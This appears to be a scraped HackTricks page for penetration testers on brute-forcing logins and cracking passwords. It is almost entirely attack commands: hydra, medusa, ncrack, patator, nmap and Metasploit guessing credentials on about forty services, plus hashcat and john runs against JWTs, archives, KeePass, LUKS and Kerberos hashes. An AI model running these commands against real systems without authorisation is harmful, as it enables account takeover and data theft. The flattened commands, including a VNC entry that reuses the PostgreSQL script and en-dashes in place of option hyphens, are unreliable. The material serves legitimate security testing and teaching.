Do you use Hacktricks every day ? Did you find the book very useful ? Would you like to receive extra help with cybersecurity questions? Would you like to find more and higher quality content on Hacktricks ? so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!
If you want to know about my latest modifications /additions or you have any suggestion for HackTricks or PEASS , join the follow me on Twitter . If you want to share some tricks with the community you can also submit pull requests to give ⭐ on github to motivate me to continue developing this book.
Default Credentials
Search in google for default credentials of the technology that is being used, or try this links :
Create your own Dictionaries
Find as much information about the target as you can and generate a custom dictionary. Tools that may help:
Crunch
Copy crunch 4 6 0123456789ABCDEF -o crunch1.txt crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha @ Lower case alpha characters, Upper case alpha characters% Numeric characters^ Special characters including spaccrunch 6 8 -t ,@@^^%% Cewl
Copy cewl example.com -m 5 -w words.txt Generate passwords based on your knowledge of the victim (names, dates...)
Wordlists
Services
Ordered alphabetically by service name.
AFP
Copy nmap -p 548 --script afp-brute <IP>msf> use auxiliary/scanner/afp/afp_loginmsf> set BLANK_PASSWORDS truemsf> set USER_AS_PASS truemsf> set PASS_FILE <PATH_PASSWDS>msf> set USER_FILE <PATH_USERS>msf> run AJP
Copy nmap --script ajp-brute -p 8009 <IP> Cassandra
Copy nmap --script cassandra-brute -p 9160 <IP> CouchDB
Copy msf> use auxiliary/scanner/couchdb/couchdb_loginhydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get / Docker Registry
Copy hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/ Elasticsearch
Copy hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get / FTP
Copy hydra -l root -P passwords.txt [-t 32] <IP> ftpncrack -p 21 --user root -P passwords.txt <IP> [-T 5]medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp HTTP Generic Brute
HTTP Basic Auth
Copy hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/medusa -h <IP> -u <username> -P <passwords.txt> -M http -m DIR:/path/to/auth -T 10 HTTP - Post Form
Copy hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V For https you have to change from "http-post-form" to "https-post-form"
HTTP - CMS -- (W)ordpress, (J)oomla or (D)rupal or (M)oodle
Copy cmsmap -f W/J/D/M -u a -p a https://wordpress.com IMAP
Copy hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -Vhydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -Vnmap -sV --script imap-brute -p <PORT> <IP> IRC
Copy nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP> ISCSI
Copy nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP> JWT
Copy hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txtpython crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txtjohn jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256python3 jwt_tool.py -d wordlists.txt <JWT token>./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 1234567890 8python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txtjwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6 LDAP
Copy nmap --script ldap-brute -p 389 <IP> Mongo
Copy nmap -sV --script mongodb-brute -n -p 27017 <IP>use auxiliary/scanner/mongodb/mongodb_login MySQL
Copy hydra -L usernames.txt -P pass.txt <IP> mysqlmsf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false OracleSQL
Copy patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017./odat.py passwordguesser -s $SERVER -d $SID./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txtmsf> use admin/oracle/oracle_loginmsf> set RHOSTS <IP>msf> set RPORT 1521msf> set SID <SID>msf> use scanner/oracle/oracle_loginmsf> set RHOSTS <IP>msf> set RPORTS 1521msf> set SID <SID>nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP> In order to use oracle_login with patator you need to install :
Copy pip3 install cx_Oracle --upgrade
Copy nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30 POP
Copy hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -Vhydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V PostgreSQL
Copy hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> postgresmedusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgresncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP>:5432patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txtuse auxiliary/scanner/postgres/postgres_loginnmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP> PPTP
Copy sudo dpkg -i thc-pptp-bruter*.deb cat rockyou.txt | thc-pptp-bruter –u <Username> <IP> RDP
Copy ncrack -vv --user <User> -P pwds.txt rdp://<IP>hydra -V -f -L <userslist> -P <passwlist> rdp://<IP> Redis
Copy msf> use auxiliary/scanner/redis/redis_loginnmap --script redis-brute -p 6379 <IP>hydra –P /path/pass.txt redis://<IP>:<PORT> Rexec
Copy hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V Rlogin
Copy hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V Rsh
Copy hydra -L <Username_list> rsh://<Victim_IP> -v -V Rsync
Copy nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP> RTSP
Copy hydra -l root -P passwords.txt <IP> rtsp SNMP
Copy msf> use auxiliary/scanner/snmp/snmp_loginnmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt <IP>hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp SMB
Copy nmap --script smb-brute -p 445 <IP>hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1 SMTP
Copy hydra -l <username> -P /path/to/passwords.txt <IP> smtp -Vhydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V SOCKS
Copy nmap -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 <IP> SQL Server
Copy crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txthydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> mssqlmedusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mssqlnmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> msf> use auxiliary/scanner/mssql/mssql_login SSH
Copy hydra -l root -P passwords.txt [-t 32] <IP> sshncrack -p 22 --user root -P passwords.txt <IP> [-T 5]medusa -u root -P 500-worst-passwords.txt -h <IP> -M sshpatator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed' Telnet
Copy hydra -l root -P passwords.txt [-t 32] <IP> telnetncrack -p 23 --user root -P passwords.txt <IP> [-T 5]medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet VNC
Copy hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt -s <PORT> <IP> vncmedusa -h <IP> –u root -P /root/Desktop/pass.txt –M vncncrack -V --user root -P /root/Desktop/pass.txt <IP>:>POR>Tpatator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!='Authentication failure' --max-retries 0 –x quit:code=0use auxiliary/scanner/vnc/vnc_loginnmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP> Winrm
Copy crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt Local
Online cracking databases
Check this out before trying to bruteforce a Hash.
ZIP
Copy fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip
Copy zip2john file.zip > zip.johnjohn zip.john
Copy hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt.\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt 7z
Copy cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z
Copy wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.plapt-get install libcompress-raw-lzma-perl./7z2john.pl file.7z > 7zhash.john PDF
Copy apt-get install pdfcrackpdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txtsudo apt-get install qpdfqpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf JWT
Copy git clone https://github.com/Sjord/jwtcrack.gitcd jwtcrackpython crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txtpython jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.johnjohn jwt.john NTLM cracking
Keepass
Copy sudo apt-get install -y kpcli keepass2john file.kdbx > hash keepass2john -k <file-password> file.kdbx > hash john --wordlist=/usr/share/wordlists/rockyou.txt hash Keberoasting
Copy john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoasthashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi Lucks image
Method 1
Copy bruteforce-luks -f ./list.txt ./backup.imgcryptsetup luksOpen backup.img mylucksopenls /dev/mapper/ mount /dev/mapper/mylucksopen /mnt Method 2
Copy cryptsetup luksDump backup.img dd if=backup.img of=luckshash bs=512 count=4097 hashcat -m 14600 -a 0 luckshash wordlists/rockyou.txtcryptsetup luksOpen backup.img mylucksopenls /dev/mapper/ mount /dev/mapper/mylucksopen /mnt Mysql
Copy <USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d PGP/GPG Private key
Copy gpg2john private_pgp.key john --wordlist=/usr/share/wordlists/rockyou.txt ./hash Hash-identifier
John mutation
Read /etc/john/john.conf
Copy john --wordlist=words.txt --rules --stdout > w_mutated.txtjohn --wordlist=words.txt --rules=all --stdout > w_mutated.txt Hashcat
Copy hashcat --example-hashes | grep -B1 -A2 "NTLM" Cracking Linux Hashes - /etc/shadow file
Copy 500 | md5crypt $1$, MD5(Unix) | Operating-Systems3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems Cracking Windows Hashes
Copy 3000 | LM | Operating-Systems1000 | NTLM | Operating-Systems Cracking Common Application Hashes
Copy 900 | MD4 | Raw Hash 0 | MD5 | Raw Hash 5100 | Half MD5 | Raw Hash 100 | SHA1 | Raw Hash10800 | SHA-384 | Raw Hash 1400 | SHA-256 | Raw Hash 1700 | SHA-512 | Raw Hash